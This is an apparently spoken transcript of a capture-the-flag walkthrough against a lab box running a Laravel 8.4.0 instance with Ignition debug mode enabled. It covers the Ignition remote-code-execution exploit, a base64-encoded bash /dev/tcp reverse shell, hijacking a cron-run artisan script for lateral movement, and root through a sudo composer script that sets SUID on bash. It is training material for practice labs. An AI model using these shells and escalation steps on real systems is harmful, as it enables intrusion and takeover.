Let's go ahead and start off with a network port scan. Today we're going to be using rustscan, which is pretty new, at least in my arsenal. I've never actually used it before, just seen a couple of videos on the functionality of it. So let's go ahead and do /rustscan with a help flag so we can see all the different options that are available to us. So I do know that this is a type of wrapper around nmap because it actually does use nmap after it does find the ports available, and we can specify different nmap commands with this dash dash option right here. And we do have this dash a for the addresses, and we do have a couple other options available to us, but we're going to be using the dash u for the u limit to make it a little bit faster. We can also specify top ports, exclude different ports, UDP. So there's a bunch of different functions that you can use, or different options that you can utilize within rustscan, although we're just going to be using a couple today, right? So let's do /rustscan and then tac a, and go ahead and place this IP address here, tac u with a u limit of 5,000, and then we'll do a dash dash with a dash sc for default scripts, dash sv to enumerate the versions, dash vv to get some verbose output, dash on, and then put it into a file. But also we do need to run this with sudo. And there we have it. So we do have two ports open, it looks like. We have port 22, which is SSH, and port 80, which is HTTP. Now here you can see that it's actually starting the nmap scan, and it's going to take a couple seconds to appear. But then we can go ahead and take it, or take a look at it more in depth right now. So let's do less enum initial. And we can see that we have two ports open here. We have 22, which is SSH, and this is running OpenSSH 8.4 on a Debian instance. And we also do have port 80, which is HTTP, and it's running Apache, which also shows that it's Debian. But we can also tell that it's a Unix system because of the TTL 61 or 62 that specifies Linux or Unix, and then Windows is, I believe, 128, 127, give or take. And then we can go ahead and tell by that specific information, right? That specific piece of information, just in case you didn't have this OS banner here. So let's go ahead and start off the enumeration by or with HTTP, right? That's pretty much the only thing that we can go ahead and take a look at the current moment, or at the current state of our enumeration process. So let's start with a directory brute force, and let's do gobuster dir, and then we can do u http and this IP address with tac w opt seclist discovery web content, and then we can do directory 2.3 medium. Go ahead and send that through. We're getting a couple of things here already, which is great. And let's go ahead and do a Nikto scan, which is just like a HTTP scanner that gives us sort of more useful information, like deep information from the cookies, the header information, different vulnerabilities that it may find. So let's go ahead and run this. And the tac h is for the host, and then we can put the IP address. And the first thing that I find interesting, right, is that we have this cookie right here. This cookie is an XSRF token. And I believe, if I'm not mistaken, that this is related to Laravel, because Laravel, at least the framework, uses XSRF tokens or CSRF tokens within their framework. So let's do Google. Let's go to Google and let's paste this in with framework. And we have Laravel right here. So we have CSRF protection, and we also have XSRF right here. We can go ahead and see that it utilizes both. And we can go back. So that's just something of use to us. So now just to take a little bit of note of, right? We do know that apparently this, like the probability of this being a Laravel instance is pretty high. We can also do Laravel to see what it runs, and we can see that this is a PHP framework. So we do know now that PHP is running on the backend. It says in case we need to craft a payload in PHP or something like that to get a shell on the box for some reason, right? Let's go ahead and open up a new tab and then go ahead and paste in the IP address right here. We can go ahead and take a look at what we got. So we do have this website, and it just looks like a plain template of a website. We do have a team or a bunch of team members here. We can go ahead and take these for later in the case that we do need to create like a word list of some type. So we could do VI notes, or let's say users, and then we can grab these guys, copy, paste, grab this one, Jan Ringo, and Kai Ringo. There we go. We can go ahead and save that and exit out of that. Fantastic. Let's scroll down a little bit. These aren't pictures that we can click on or anything. We do have this pricing option here, but none of these buttons do anything. We do have this contact page here. Now this just looks like default information, just so that the user or the creator of this default sort of template web page can come in here and put their own information. Although this does have a contact page, and we can see if this has any actual functionality to it. We can do ASDF and send it through, and we get a 404 not found. Although this does give us a useful amount of information. This says we have a Laravel 840 instance, right? So if we copy this, we go ahead and go to Google. We can paste this in here with exploit, and we can see that we have a Laravel 842 debug mode remote code execution vulnerability or exploit. But before we look at this, right, let's go back for a second. Let's exit out of this one. Let's go back here, and if we do a Control-Shift-I, we'll open up the developer tab. We can reload this, and right here, the first get request, we can click on here, and we can see the headers, and we can see the cookies of this instance, right? So remember, we were talking about the Laravel and the XSRF and different cookies related to the framework. So here is the Laravel session token, and here is the XSRF session token, or token, right, that is set within this instance or within this session that we have right here. So just in case you wanted to find out how to go ahead and take a look at this, this is also another way that you could do it. Click on the cookies, go ahead and take a look at this, and maybe try and decrypt this value. I know that there is a certain program or POCs that allow decryption of Laravel cookies. So that's another thing that we can go ahead and take a look at later if we got the time, right? So let's go ahead and take a look at what we have here. We have a few things here. We have this remote code execution from ExploitDB. We have another GitHub POC, and we have a blog post that sort of explains everything. Let's see what's in here in the ExploitDB file. If we scroll down a little bit, let's see what we have going on here. So I'm assuming that we're sending requests to a certain endpoint, considering that we have this request module here, and we're setting up some JSON data here and some headers. Scroll down a little bit, and let's see, what endpoint are we sending to? Okay, so we're sending to this ignition execute solution module, or execute solution endpoint, right? And with this execute solution endpoint, we need to specify a few things. One of the first things that we need to specify is this solution parameter here. We're going to be specifying this vulnerable class right here, this make view variable optional solution. And this class has two functions in it. One function is file get contents, and the other one is file put contents, and those two functions allow us to read and write to files. Although we can't actually input into this vulnerable parameter right here, this view file, we can't actually input like etc pspy to get it printed out on the screen for us. We actually need to use PHP filters in order to create a request chain that allows for this type of attack. And now this type of attack is a log poisoning attack. So let's see how this actually works. If we scroll down a little bit, we can see the different functions defined here. And this clear log function, the first step in the process of this vulnerability is going to be to clear the log file of any remnants of data that might interfere with our payload being executed, right? So we're going to do that with this specific PHP filter here. Then we're going to create a payload of 2 bytes. And this is because we're using UTF-16. We can see that right here. We're using UTF-16, and this type of encoding aligns payloads by 2 bytes. So we're just going ahead and setting up some formatting within the log file. This will just create an error and store it in as the first sort of entry in the log file. Then we have this create payload, which creates the actual malicious payload. And how we're going to create this is going to be, considering this is PHP, we're going to create it through a serialized PHP payload. Now, to do that, we can use PHP GGC, which I have mentioned in another video, Crane, I believe, that we actually go ahead and create this manually and then send it through and have our code be executed through it. And so with this certain tool, we can go ahead and choose a gadget chain that allows us to set a function of or a certain PHP function that we want to execute, which is system, and then the command that we want to execute. And then we go ahead and put it into a var format so that we can use a var filter to go ahead and execute it. We also encode it in base64, and that's important to understand because down here, once we send this payload through, it's going to create an error. It's going to store it inside the log file. And then after that, we're going to convert it back from base64 into normal quoted printable strings. And that'll just store it as a normal serialized payload. Then after we do that, all we have to do is use this exploited function, which calls a var filter to execute that serialized PHP code. So that being said, let's go ahead and take a look at how this actually works. Now let's go back here, and in order for this to work, just had to mention this, in order for this to work, we need debug mode to be enabled on the Laravel instance. So let's go ahead and go back, and if you remember, we saw a login form, so we could do /login. And we get this login form here. And let's scroll in a little bit. And we can try a bunch of different things in here, right? We can try admin at admin.com. And then let's do admin. Nothing there. Password. Nothing there. We can try test at test.com. And then password. Test. And admin. And we don't have anything here, right? We can't really log in here. We don't have any valid usernames, any valid email addresses. So this is not really going to work for us right now. Although there is this register function up here. So we can go ahead and click on that. And let's try and register a user. Doesn't matter what it is. And look at this, fantastic. We have the ability to enable debug mode. So that being said, let's go ahead and enable this. And let's go to Google. And we can get this specific POC. Let's do Laravel RCE. And this specific POC is fairly good, at least from what I've seen in the past. Let's go ahead and grab this. Let's make dir exploits. CD exploits, and then let's git clone on this. Let's CD into it. And here we have the .py file. Now what we're going to do is let's do subl on CVE, open it up in Sublime Text, and let's go ahead and add a proxy in here so that we can proxy the traffic through Burp to see what's actually going on and see the requests that were being sent. So if we go to the top, all the way to the top, and right here before the main function or the main class is defined, we can go ahead and put proxies equals, And then we can set a dictionary for this, and we can do HTTP 127.001:8080, set up that proxy. And then if we search for, let's see, verify, what's the next one? We want the post request. Here it is. So this post request right here that's posting to the endpoint that we were looking at, we want to go ahead and put a comma here and do proxies equals proxies to go ahead and proxy that traffic. Let's save this. We can go ahead and exit out of this, open up burp. Next. Go ahead and open up that proxy, and let's go ahead and run this. Python 3, CVE. Okay, we have this, HTTP, and then we can go ahead and put in the IP address with a trailing slash. And now it's giving us a, please enter the command to execute. And it also, if we didn't already know the log file or where the location of the log file was stored, it brute forces that for us, and it goes ahead and grabs it and tells us right here, which is pretty cool. So we can do execute and then who am I? Okay, it did. So what happened here is that I didn't have the PHP GGC binary already downloaded, so it went ahead and downloaded that for us. And so it's trying the first gadget chain. It's 1 out of 21. We're trying the Laravel RCE1. So let's see if this works, and then we'll go ahead and explain how it went about. Okay, so this didn't seem to work. Let's try this again. Execute, who am I? Sends it through, forward. There you go. Okay, so we didn't get a response from this, so that means that this certain gadget chain did not work, although it does say that it did. It didn't work. So let's go ahead and try the next gadget chain, which is going to be RCE2 or Laravel RCE2. Forward all these requests. And we get a dub data. So we know that this gadget chain works. So let's go over this for a moment, and we can take a look at what's actually going on here. Waiting for the next request to go through. Okay. Let's try this again. Let's do help, and then I want to, okay, here we go. Use a chain. So let's do chain Laravel RCE2. Go ahead and put in the IP address again. Have it sent through. Execute. Who am I? Okay, let's go ahead and take a look at this, right? So the first thing that we're doing is we're clearing the log file with this PHP filter here. So we're converting UTF-8 to UTF-16, and then we're converting we're encoding the quoted printable strings. Then we're going ahead and transferring or converting this again from UTF-16 to UTF-8 and base64 decoding it in the resource of the log file. So then let's go ahead and send that through. We are creating the 2-byte error for the formatting. Now this is the actual payload that we're sending. Now these are just for a little bit of padding to make sure our payload gets formatted correctly and also gets base64 encoded correctly so that it's able to be executed. Then let's go ahead and forward this. This is the PHP filter that goes ahead and base64 decodes our payload. And here is the far filter that goes ahead and executes that payload. So let's forward this. Okay. Let's see. Let's try this again. Make sure that this still works or this gadget chain is still available. Yeah, it does. Awesome. So let's go ahead and just get a reverse shell on here. So let's do vi shell. And then let's go ahead and do a bash tag I to and slash dev TCP, and then let's do 192.168.45 on 9999, and then we can do 0, 2, and 1 like that. We can cat shell and then base 64 W0 to encode it. Now we do have these plus signs, right? And we want to get rid of these. So we could just add a few spaces in here, and that'll go ahead and get rid of that for us. So let's add one here. Let's add 4 over here. And let's add one right here. I believe that will do it. Yep, we're good to go. Let's go ahead and copy this. Close out of that, and let's close out of this. Open this up again. And now we're going to execute. Echo this, base 64 tacd bash. Let's go ahead and set up ncat and VLP. Or let's go ahead and actually just, yeah, that's fine. Ncat NVLP 9000, no, 9999. Send this through. Okay, here are the requests. Send, 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 far. And we get a shell on the box, just like that. That's pretty cool. So I hope you guys enjoyed that little like preview of what was actually going on. I know I did when I was trying to understand the actual vulnerability. And so that being said, let's just go ahead and continue from here and see if we can stabilize our shell a little bit better. Let's go ahead and see which Python. Fantastic. Python 3, tag C, import pty, pty.spawn, and then we can do bin bash like this. Control Z, stty raw minus echo, fg, and then we can do export term equals xterm. We can clear the screen. Awesome. Let's see what we got in here. So it looks like we are in the root of the file system. Let's see. Let's start with an ID. Are we part of any groups? No. Let's do a env set to see what environment variables we have here. We scroll up. We do have a DB password here of this. We can go ahead and grab this. Let's see. Is there the DB port of 3306, which is MySQL? Is there a username? DB username LaVita. Fantastic. So let's go ahead and try this out. MySQL, and then we can do tacu LaVita with tac h 127.0.0.1 and tac p. Enter this password, and we're into a MariaDB session or a MySQL session. So what we can do is we can do show databases. There you go. We have this LaVita and then information schema. So let's use LaVita and let's show tables. We have a users table. We can do select all from users. And we only have one user here, which is the user that we created. So I don't think that this is going to be very useful to us, at least on this box. That's just something cool that you could do to enumerate that environment variable. Another thing that you can do is you can cat proc self environ to get also the environment variables here. We can also see if there's any SUID bits. So we could do find /perm -4000 to dev null. See if there's any useful SUID bits that we can go ahead and take advantage of. And it doesn't look like it. There's just these normal ones or the default ones. Let's see what else. Another thing that we can do is see who or what other users are on the box, right? So let's do cat etc pass wd and then grep for anything that ends with sh. And we have this skunk guy. I believe if we go back here and we go to the beginning, yeah, this Johnny Skunk. So this is the website designer, the web developer, and we want to go ahead and see if we can get to him. So let's see what else we have running here. We can do an SS and LTP, see the ports, and we only have 3306 running on or internally. So that's not really going to help us there. We can do cat etc cron tab. We don't have any cron jobs running as root currently. Let's see, what else can we do? We can also do psef and then grep for root. See what's happening here. See if there's any processes being run. Cron.f. So there might be a cron job or some type of process running in the back that we can't see at the moment. So yeah, that's the next step that I'm thinking of. Although let's go ahead and upload linpeas on here. So let's do locate linpeas.sh. We have it here. Let's go ahead and grab that cp opt linpeas linpeas.sh, and we'll copy it here. And let's do python 3 m http server on port 80. Let's do wget, or let's go into var www html, or actually let's just go into temp. That work. Yeah, there we go. So let's do wget on http, and we can do our IP address, linpeas.sh. We have it there. We can do chmod plus x on linpeas. And let's go ahead and close out of this and run linpeas. Let's go ahead and see what other information that's hidden that we can sort of utilize, right? I think if we start from the top here, we can actually see that this does catch the password here, the DB password. It also captures the mail password that's not there, and an old password. Also Redis, a Redis instance supposedly. We can scroll down here. These are a couple of kernel exploits that it suggests. We can scroll down a little bit more. These are all the processes. We already went ahead and took a look at that. What I did want to see is to see if this catches the permissions that are available to all the users. Where can I go ahead and see that? Maybe I can't even see that. Let's see. Let's scroll down here. Here we go. Skunk. All right, here he is. So we do have Skunk, and Skunk is a part of the SUDO group. So this is pretty good. If we are able to get here, and he's part of the www data group. So if we're able to get to Skunk, we can go ahead and run basically anything as sudo, I'm assuming. So let's go ahead and see if there's anything else here, which honestly doesn't look like it. Scroll down a little bit. LDAP, no. Sage config, passwords. DB password null. Nothing here. Let's see. It doesn't look to me like there's going to be much else here, although there is something that I want to try. And this is a new tool that I've never actually used before until this box personally. I've heard of it before, and I thought it was pretty cool that you can utilize this, although it is called pspy or pspy. So we could do locate pspy64, grab it here. Now, this certain binary, right, or this tool allows you to view processes in real time. So, or hidden processes, normal processes in real time, and go ahead and enumerate that a little bit further, right? So let's do CP this here. Let's go ahead and do another Python server. Set that up, and then we can do another wget here. pspy 64. Here we go, we got that. Close out of this, and then we can do chmod plus x on pspy, and let's go ahead and run this. Okay, so here we have all these processes running in real time. Let's see if there's anything here that might be useful to us. Let's see, let's go up a little bit. So there's a couple things here. All right, so you can see that here is where we are, basically. This is ours. This MariaDB. You can scroll down a little bit. Let's see. Okay, here we go. So we do have right here this UID of 1001, which is running this artisan script using PHP just to clear some pictures. So 1001, if you remember back to the actual enumeration of the people and their groups, right, or the groups that they were a part of, we can see, let's see if we find it again. Oh boy, there's a lot of output. Here we go. We can see that 1001 is skunk. So we can see that he's actually running something here, and it's running in the LaVita directory, which is our user's current directory or home directory, or var www HTML directory, right? So we have access over this, or we have right access to go ahead and hijack this and see if we can become skunk. So let's go ahead and exit out of this. Let's do cd var www HTML LaVita, and then we can do an ls-la on artisan like this. We can see that we do have all these permissions, and it's part of the www group, and it's owned by us. So let's do nano on artisan. And this is just a simple PHP script. So what we can do is we can do system and like this. And in here, we can do, I believe it's going to be bash tech I. We can do another reverse shell or actually, you know what? We don't even need to do it like that. Let's just go ahead and do echo. Do I still have that in there? No, I do not. Let's just do the same exact thing that we did over here. Let's cat shell and then base 64 tech w0. Grab this, close out of this. We'll echo this here. Base 64d bash like that. And then what we can do from here, oh, actually that's not going to work because this is running on a different port. So we're just going to have to go ahead and change that real quick. No big deal. VI shell. We'll go ahead and change this to 8. That works. We could do, let's do this again. Grab this, paste, base 64d, and then bash, and cat nvlp on 9998. Set that up. Let's go ahead and save and quit out of this. And now we wait. We just go ahead and see if this runs again. If it runs, we should get a callback as skunk. Now, I don't know how long it'll take to actually run that artisan script, although we can give it about, let's say, a couple seconds, couple minutes. And let's actually see something real quick. If we go, I'm afraid to say that if this might need to be in quotes like this. I'm not exactly sure. Let's actually just test that real quick. Let's do this. Let's go ahead and exit out of this. All right, it's saved. Now the only way we can do it is wait. So I'm gonna go ahead and pause the video and see if it comes back in a minute. All right, so it was a couple of seconds and we did get a callback as skunk. So this is pretty cool. Now we are skunk and we can do sudo tag L and we can see that we have all and all, but not as root. We can run, I mean, we do have all, but we do need a password and we don't have skunk's password, but we can run with no password as root this user bin composer in the working directory of also LaVita with any extra option afterwards. So if we go ahead and come up here, let's go ahead and do, we don't actually need to do that for now. I was going to go ahead and do the Python sort of better shell, but we don't really need that at the moment. We already have this one currently, and we can do all the configurations from www.data as well. Although, let's go ahead and take a look at this. We have Composer here, so we can go to Google, and we can do GTFO bins, grab this, Composer, here it is. We can go to the sudo privilege, and we can see that this is just echoing a Java, or yeah, no, a JSON query or a JSON like command into the composer.json file. So, or a JSON entry more like. So let's go ahead and do that. That's fairly simple. It is, if I zoom in here, we're going ahead and saying that this is a script. We're naming the script here, and then we are putting what the script is going to do right after. And so that's pretty simple, pretty self-explanatory. We can go back here and we can do echo. Well, let's first see ls delay on composer.json. All right, fantastic. Echo on, and then we can do like this, scripts, and then we can do privileges like this. And then we can put the actual command that we want to run. And what I'm going to do is, let's do a /bin bash tag p, right? We can go ahead and close this out. Oh man, our TTY is terrible. So let's do stty rows 100 and calls 100 or two. Let's do 200. Why not? Let's do that again. Let's do echo and then scripts privileges. This is the name. Then we're going ahead and putting the command bin bash tag p for privileged mode. And then we can close that out, close this. Actually, we need to, yeah, we need to open another bracket here. Am I correct? No, it's before this one. Okay. Let's go ahead and exit this a little bit. There you go. We can put another bracket here, close those brackets out. And then in here, we can do privileges and bin bash -p like that. Close this out. I believe that's good. And then we can go ahead and put this into composer.json like this. And from here, we can go ahead and do sudo user bin composer like this. And we could do run script privilege like this. And that didn't seem to work. Odd. Let's see. What else can we do? What else can we do? Okay, I know another thing that we can do. We can do cp/bin bin bash /temp bash, creating another bash binary. And then after that's completed, we can do chmod plus x. Actually, let's just put this chmod plus x on /temp bash. Okay. That seemed to /temp bash. Good. That seemed to have worked. Let's try this again. Okay. Now let's do ls-la on /temp bash. Fantastic. It doesn't seem like it. Oh, because that may be useful to put. I meant to put the boy, man, these shells are always finicky, man. Let's try this again. Bash. There you go. And then we'll do chmod plus s on temp bash. We'll close it out with this, and then these two brackets with this into composer.json. Let's try this again. Okay, now if we did this, yeah, there we go. Now we got the SUID bit on this temp bash, and we could do /temp bash -p id, and we can see that we are root. Oh my god, that was an incredible amount of work. So yeah, that's pretty much the box. That's everything that we had to do. I know it was a lot. This took a long time, but I hope you guys got a little bit of use out of this. This was a fairly cool box. I thoroughly enjoyed it, and it did have a good amount of effort to be able to put into it. And a little bit of lateral movement before we can move vertically and get to root, right? So what we can do from here is we can do cd/root, and then ls. We can see the proof.txt right here, and the local.txt is in skunk's home directory, and you could just go from there. So I hope you guys enjoyed. I hope you guys learned something from that whole Laravel vulnerability explanation. I hope that I did a good enough job to be able to grasp the concept. Maybe not, but go ahead and check out those blog posts, because those do explain it in a super easy to comprehend way, right? And so yeah, I will see you guys in the next one.